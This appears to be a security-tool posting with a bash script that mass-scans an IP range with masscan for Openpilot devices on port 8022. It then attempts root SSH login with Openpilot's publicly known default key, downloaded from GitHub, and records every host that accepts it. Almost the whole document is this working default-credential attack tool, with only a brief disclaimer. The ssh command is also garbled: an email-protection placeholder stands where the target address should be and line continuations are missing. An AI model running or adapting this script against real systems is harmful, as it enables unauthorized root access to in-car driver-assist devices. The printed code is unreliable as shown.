Authored by Jeremy Brown

Openpilot has a default SSH key that can allow attackers remote access if not changed. This script port scans and attempts to login to Openpilot SSH servers with the default key.

#!/bin/bash
#
# openpilot-scan.sh
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Checks for openpilot devices using the default SSH key
#
# Setup
# > apt-get install -y masscan && setcap cap_net_raw=ep /usr/bin/masscan
# > wget -q https://raw.githubusercontent.com/commaai/openpilot/master/tools/ssh/id_rsa
# > chmod 600 id_rsa
#
# Example
# > ./openpilot-scan.sh 10.100.100.1/24
#
# Disclaimer
# This script will port scan and attempt login to SSH servers which accept a
# given key. Use it at your own risk, no guarentees, only scan your own network
# or those that you have permission to scan. You assume full responsibility
# for any use or execution of these tools, authorized entry or otherwise actions.
#

KEY="id_rsa"
MATCH_IP='[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}'
MASSCAN_LOG="masscan.log"
SCAN_LOG="scan.log"
FOUND_FILE="found.txt"
SSH_PORT=8022
USER="root"

if [ $# -ne 1 ]; then
echo "usage: ./openpilot-scan.sh ra.n.g.e/24"
exit 1
fi

# scan
masscan --open -p $SSH_PORT -oL $MASSCAN_LOG $1 >/dev/null 2>&1

# parse
grep -ohP "$MATCH_IP" $MASSCAN_LOG > $SCAN_LOG

# check
while read IP
do
ssh [email protected]$IP
-p $SSH_PORT
-o batchmode=yes
-o StrictHostKeyChecking=no
-T -i $KEY >/dev/null 2>&1

if [ $? -ne 255 ]; then
echo $IP
echo $IP >> $FOUND_FILE
fi

done < $SCAN_LOG